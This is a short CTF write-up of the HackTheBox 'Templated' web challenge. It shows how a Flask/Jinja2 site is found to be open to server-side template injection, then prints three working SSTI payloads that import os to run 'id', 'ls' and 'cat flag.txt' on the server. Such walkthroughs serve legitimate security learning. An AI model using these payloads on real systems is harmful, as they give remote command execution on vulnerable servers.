Templated — HTB Web Challenge Writeup
data:image/s3,"s3://crabby-images/92bdf/92bdf604e0cfd7d541b42e97b095b2ef17611955" alt="Templated — HTB Web Challenge Writeup"
CHALLENGE DESCRIPTION
Can you exploit this simple mistake?
First Start Instance and then you are provided with an web address
in the form of <ip>:<port>
. Copy it and open it in another tab or browser. In my case it was http://134.209.18.1:30563
Now let’s visit the webpage:
data:image/s3,"s3://crabby-images/25198/251986f609cf94986ad8a469ae57d10acafd120d" alt="HTB Web Challenge Templated writeup"
The web app shows a message Site still under construction
Proudly powered by Flask/Jinja2
There is a hint do you notice? Yeah, you notice… Here the web app technology is Flask/Jinja2. (It is a hint for us.)
If you search for Flask/Jinja2 exploit then you can find it has SSTI (Server Side Template Injection)
We can indicate possible SSTI by adding {{ 5* 5 }} to the parameter search, we can see that the template engine evaluates the mathematical expression and the application responds with 25.
data:image/s3,"s3://crabby-images/fe756/fe7565e8b794d90a630e3800bca3c2acda2e5f15" alt=""
Now we are going to exploit this using SSTI
Use the bellow payloads to begin our exploitation to get the flag!
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
data:image/s3,"s3://crabby-images/b978c/b978c2e0df3ce5a63348eac4375acb8c66b5fed2" alt="HTB Web Challenge Templated Writeup"
{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}
data:image/s3,"s3://crabby-images/20c64/20c643a3660567a2b35078791f646e1326fe4746" alt="HTB Web Challenge Templated"
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
data:image/s3,"s3://crabby-images/5e084/5e084fede3b6fc4f922688299e281b346e1334fb" alt=""
Hurrah!!! We found the flag. This is where our challenge finished :))
Comments